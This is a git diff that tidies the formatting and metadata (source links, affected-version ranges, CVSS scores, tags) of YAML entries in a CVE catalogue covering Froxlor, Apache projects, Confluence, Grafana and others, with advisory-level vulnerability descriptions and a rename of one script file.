diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index 7cd4ff5e33a30081e24c43d0609960766aa5866f..6e50fa4132dc90acbf7eaaaf8b7c6204905a42c6 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,5 @@ id: CVE-2021-42325 -source: - https://www.exploit-db.com/exploits/50502 +source: https://www.exploit-db.com/exploits/50502 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -8,7 +7,7 @@ info: Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: - Froxlor 0.9~0.10.30 + 0.9 < Froxlor < 0.10.30 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml index 5823536abbef629b12ff077f4ea608daf7ab157d..1dca795a263837667089473f84550fa9305eada9 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml @@ -1,13 +1,12 @@ id: CVE-2023-0315 -source: - https://github.com/mhaskar/CVE-2023-0315 +source: https://github.com/mhaskar/CVE-2023-0315 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high description: | Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。 scope-of-influence: - Froxlor 2.0.8 之前的版本 + Froxlor < 2.0.8 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0315 - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml index c65b99eaf5fa6ce246dfb9eaaa9cbb600cd9ecce..792cb12794592e64a58b643da2c8c86d51dde287 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml 
@@ -1,13 +1,12 @@ id: CVE-2023-0877 -source: - https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ +source: https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high description: | Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11. scope-of-influence: - Froxlor before 2.0.8 + Froxlor < 2.0.8 reference: - https://github.com/blakduk/Advisories - https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ diff --git a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml index 6580d144188b424c6454b72efa75c6b32853e90a..79e07b158c4feb9ad8afe483b3e9f52d9781a41f 100644 --- a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml +++ b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml @@ -10,7 +10,7 @@ info: reference: - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml index eaf35209943ec4becb161261a0bd3936c528cf5b..685d9c26d921905d07a8de655799aca083a1962d 100644 --- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml 
@@ -4,9 +4,9 @@ info: name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 severity: critical description: | - InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: - InfluxData InfluxDB <1.7.6 + InfluxData InfluxDB < 1.7.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 classification: diff --git a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml index b95ffd9b823c26b5f87a682f0d893248b7f496fc..1d218dd7bd156fd89b8cd4add379a62ed3efefed 100644 --- a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml +++ b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml @@ -4,7 +4,9 @@ info: name: Java SE(Java Standard Edition,Java 标准版)是Java技术的核心和基础,是Java ME和Java EE编程的基础。Java SE是Java程序设计语言和Java平台的总称。 severity: high description: Oracle Java SE(组件:库)中存在漏洞。易被利用的漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而危害Oracle Java SE、Oracle GraalVM Enterprise Edition。成功攻击此漏洞会导致对关键数据或所有Oracle Java SE、Oracle GraalVM Enterprise Edition可访问数据进行未经授权的创建、删除或修改访问。 - scope-of-influence: Oracle Java SE:17.0.2和18;Oracle GraalVM企业版:21.3.1和22.0.0.2 + scope-of-influence: + Oracle Java SE:17.0.2和18 + Oracle GraalVM企业版:21.3.1和22.0.0.2 reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449 - https://security.netapp.com/advisory/ntap-20220429-0006/ diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml index 4223ef65fc6d4cb17e9e9d205871bc2243a17f30..b0147978bfe488e7916d4a6853c0cd14911d06a3 100644 --- a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml 
@@ -1,6 +1,5 @@ id: CVE-2019-8942 -source: - https://github.com/synacktiv/CVE-2019-8942 +source: https://github.com/synacktiv/CVE-2019-8942 info: name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 severity: high diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py similarity index 99% rename from cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py rename to cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py index d440f7e6ad590541df5cfcb09723f758a5e5975f..f447f3d2d0fe9b9b3b3a71c93bd5a962847adb7e 100644 --- a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py +++ b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py @@ -233,4 +233,4 @@ The available modes are: args = p.parse_args() - main(args) + main(args) \ No newline at end of file diff --git a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml index 883d103f4046c2f7624ddf38cb766b838197bbdb..a70bb45707c839a726eb99898c0f5c46950fe142 100644 --- a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml +++ b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml @@ -11,7 +11,7 @@ info: - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 cnvd-id: None diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml index 50fd50933b6fd9d54ff9e4a4ad5160724bc76d9b..f1346b553181ae448f22997172a3999f35e9e133 100644 --- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml +++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml 
@@ -8,8 +8,8 @@ info: scope-of-influence: apache-CouchDB < 3.2.2 reference: - - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... - - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... + - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code-Execution.html - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 - http://www.openwall.com/lists/oss-security/2022/05/09/2 @@ -17,7 +17,7 @@ info: - http://www.openwall.com/lists/oss-security/2022/05/09/4 - https://docs.couchdb.org/en/3.2.2/setup/cluster.html - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 - - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... + - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd - https://www.openwall.com/lists/oss-security/2022/04/26/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -26,7 +26,4 @@ info: cwe-id: CWE-1188 cnvd-id: None kve-id: None - tags: - - 不安全的默认资源初始化 - - 弱口令要求 - - 远程代码执行 \ No newline at end of file + tags: 不安全的默认资源初始化, 弱口令要求, 远程代码执行 \ No newline at end of file diff --git a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml index 2ae1946821aad57625ba6339d2e660e857b246ec..f467401d2147bd45fafce1655b052a8d8b7a061b 100644 --- a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml +++ b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml @@ -12,7 +12,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-17564 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17564 cwe-id: CWE-502 
diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml index faf28d8b6d6d0252ca4fe88fa923903c93239c54..2a64f8c3a941363cdc4f0b298f558d88ada1d968 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml @@ -11,7 +11,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-25641 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25641 cwe-id: CWE-502 diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml index 1ba752b3e75dfa30047abf05aebfe1b231f0d1b6..dacaa27701a8e20aaba0b2570a1385c0d30c9cd6 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml @@ -11,7 +11,7 @@ info: - https://help.aliyun.com/document_detail/390193.html - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-43297 cwe-id: CWE-502 diff --git a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml index 84888dbf308aaa0e8467a831cecbddc9e8f4617e..5908596e31c369af9160d8e62c60865cc68db0b4 100644 --- a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml +++ b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml @@ -8,11 +8,10 @@ info: description: | Apache HTTP Server 2.4.20版本至2.4.43版本中存在安全漏洞,攻击者可借助‘Cache-Digest’标头中带有特制值的HTTP/2请求利用该漏洞造成Push Diary崩溃。 scope-of-influence: - Apache HTTP = 2.4.20-2.4.43 + 2.4.20 ≤ Apache HTTP ≤ 2.4.43 reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490 - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 
diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml index 48a8205edb0b8d7dc92a9657083587c436d2dbbe..0fd3ca934296d73060b671b5d5d2f77e71b33247 100644 --- a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: cve2021,Apache,目录遍历 \ No newline at end of file + tags: cve2021, Apache, 目录遍历 \ No newline at end of file diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml index 25ad632212517b6cbcc0d219896e7dbee9fa5ad3..87bc94c690f5bd5cfe317cdfb1bcff990bf68408 100644 --- a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml +++ b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml @@ -6,7 +6,7 @@ info: description: | Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。 scope-of-influence: - Apache HTTP = 2.4.49, Apache HTTP = 2.4.50 + 2.4.49 ≤ Apache HTTP ≤ 2.4.50 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - https://httpd.apache.org/security/vulnerabilities_24.html @@ -17,4 +17,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: cve2021,Apache,目录遍历,RCE \ No newline at end of file + tags: cve2021, Apache, 目录遍历, RCE \ No newline at end of file diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml index 16b59c306cdbe0bbfa2771f8ff8443b4c6da3074..dc2f24c54448bac38306cdad3cfb9529aa1dded4 100644 --- a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml +++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml @@ -5,7 +5,6 @@ info: severity: critical description: CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 - scope-of-influence: Apache OFBiz < 17.12.06 reference: 
diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml index 12fb0f1aced261e773290a27a814ff19ec8c1317..702f229ff58c101071de66d9b388eb9348a5b400 100644 --- a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml +++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml @@ -6,7 +6,7 @@ info: description: | 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。 scope-of-influence: - Apache Shiro 1.9.1之前 + Apache Shiro < 1.9.1 reference: - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh - https://nvd.nist.gov/vuln/detail/CVE-2022-32532 @@ -14,10 +14,10 @@ info: - https://cxsecurity.com/cveshow/CVE-2022-32532/ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32532 cwe-id: CWE-863 - cnvd-id: CNNVD-202206-2750 + cnvd-id: None kve-id: None tags: 旁路授权 \ No newline at end of file diff --git a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml index 4b8f08c3e4dada3a5d09df63b66fffaf70d71eb4..e1ca89c001ccedfed6d3df8c18d7a7e7fbb76715 100644 --- a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml +++ b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml @@ -16,5 +16,4 @@ info: cwe-id: CWE-502 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml index d66c1fe0a97dd377f0f3fe23b59afb78dc4f3053..8ff102a172a2a9fbf0043db7905908336e9e14ad 100644 --- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml +++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml 
@@ -16,5 +16,4 @@ info: cwe-id: CWE-20 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml index e1e4a6e846ed2f110965d3d2507c6fad252e1246..d33a68ae16c6a225aeb191adf5a8c17a73fe22d2 100644 --- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -20,5 +20,4 @@ info: cwe-id: CWE-1321 cnvd-id: None kve-id: None - tags: - - 远程命令执行 + tags: 远程命令执行 diff --git a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml index b10e9d5a578eb7d115cf3ff6d6b9b896413846ad..c47208c853cac6cde1b5cf794ba4e3e2d9007c7f 100644 --- a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml +++ b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml @@ -2,7 +2,7 @@ id: CVE-2021-27905 source: https://github.com/Henry4E36/Solr-SSRF info: name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 - severity: high + severity: Critical description: Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。 scope-of-influence: @@ -11,9 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://security.netapp.com/advisory/ntap-20210611-0009/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-27905 - cnvd-id: CNNVD-202104-914 + cwe-id: CWE-918 + cnvd-id: None kve-id: None - tags: cve2021,Apache,Solr,SSRF + tags: cve2021, Apache, Solr, SSRF diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml index a8c37b12be698bd3a81175a9591da5b2a6412c14..c9e57971b2839a7565ec27a5f6cb5df3d86eda66 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml 
@@ -15,7 +15,7 @@ info: - https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ - https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-13935 cwe-id: CWE-835 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml index 38a9cc6c670a93fc2e685dbc5f4f1dd01f028df5..0f7d54edeb8b9b2581f37eff44fe75d6ce2cbfb5 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml @@ -1,7 +1,7 @@ id: CVE-2020-1938 source: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat info: - name: Java 是目前 Web 开发中主流的编程语言,而 Tomcat 是当前流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 + name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: critical description: Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml index e4cf2843d01133e28021b85a4daea0884c53fdda..ccee231269e043c194ffb24a8629b6637d446042 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml 
@@ -1,7 +1,7 @@ id: CVE-2020-9484 source: https://github.com/RepublicR0K/CVE-2020-9484 info: - name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 + name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 severity: high description: 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 diff --git a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml index 869c3135bc8ad0734197c39377f7ec43c215b178..9d0a4149674098265a0b08c3af1e65a5e30627b0 100644 --- a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml +++ b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml @@ -1,7 +1,7 @@ id: CVE-2022-29885 source: https://github.com/quynhlab/CVE-2022-29885 info: - name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载,从而触发拒绝服务。 + name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: high description: 当Tomcat开启集群配置,且通过NioReceiver通信时,无论服务端是否配置EncryptInterceptor,攻击者均可构造特制请求导致目标服务器拒绝服务。 diff --git a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml index 7cd008cb68e9aee1c04894eb8f8e33b2c9dc8445..9ec1f93a2326d9b5614f856f91e62e6e6ce63013 100644 --- a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml +++ b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml @@ -1,6 +1,5 @@ id: CVE-2020-13942 -source: - None +source: None info: name: Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。 severity: critical 
diff --git a/cve/confluence/2019/yaml/CVE-2019-3394.yaml b/cve/confluence/2019/yaml/CVE-2019-3394.yaml index b79454abc7916761e4f6dc18ed9c4711b1d46a2d..005279378b9e2b6f118698ce0ab5abbd730be420 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3394.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3394.yaml @@ -1,6 +1,5 @@ id: CVE-2019-3394 -source: - none +source: none info: name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。 severity: high diff --git a/cve/confluence/2019/yaml/CVE-2019-3396.yaml b/cve/confluence/2019/yaml/CVE-2019-3396.yaml index e91ff6d3daac7d1ce93443aa7b460cdf3aad2643..8cbe8d8eac4cc289d0449e128e0263b6a8688e51 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3396.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3396.yaml @@ -1,5 +1,5 @@ id: CVE-2019-3396 -source: +source: https://github.com/Yt1g3r/CVE-2019-3396_EXP info: name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。 severity: critical @@ -20,4 +20,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: RCE,cve2019,任意文件读取 \ No newline at end of file + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file diff --git a/cve/confluence/2021/yaml/CVE-2021-26084.yaml b/cve/confluence/2021/yaml/CVE-2021-26084.yaml index ae6294f545a4a34804a278f43c08146d48e19084..c90bd51e43a9073d4b348fd6ce568266e03e3fdd 100644 --- a/cve/confluence/2021/yaml/CVE-2021-26084.yaml +++ b/cve/confluence/2021/yaml/CVE-2021-26084.yaml @@ -47,4 +47,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2021,OGNI注入 \ No newline at end of file + tags: RCE, cve2021, OGNI注入 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26134.yaml b/cve/confluence/2022/yaml/CVE-2022-26134.yaml index 76029829737b632d6d4fddffb976533ec03272ea..0c76072899aeafdb60e308fe18a9c160b20de3a8 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26134.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26134.yaml 
@@ -24,4 +24,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26138.yaml b/cve/confluence/2022/yaml/CVE-2022-26138.yaml index d399d06b0dcfa01f9c0ce30e31a678cad9699ec4..9b39b96c6afe83a6860d8d816cc4a892bccb385d 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26138.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26138.yaml @@ -1,6 +1,5 @@ id: CVE-2022-26138 -source: - https://github.com/shavchen/CVE-2022-26138 +source: https://github.com/shavchen/CVE-2022-26138 info: name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/django/2021/yaml/CVE-2021-31542.yaml b/cve/django/2021/yaml/CVE-2021-31542.yaml index f4db55bd543c3a36b5ae949d44888fd7a508c534..d70c7c6301f2edbfb281b6d27025831cb9155539 100644 --- a/cve/django/2021/yaml/CVE-2021-31542.yaml +++ b/cve/django/2021/yaml/CVE-2021-31542.yaml @@ -1,6 +1,5 @@ id: CVE-2021-31542 -source: - https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md +source: https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 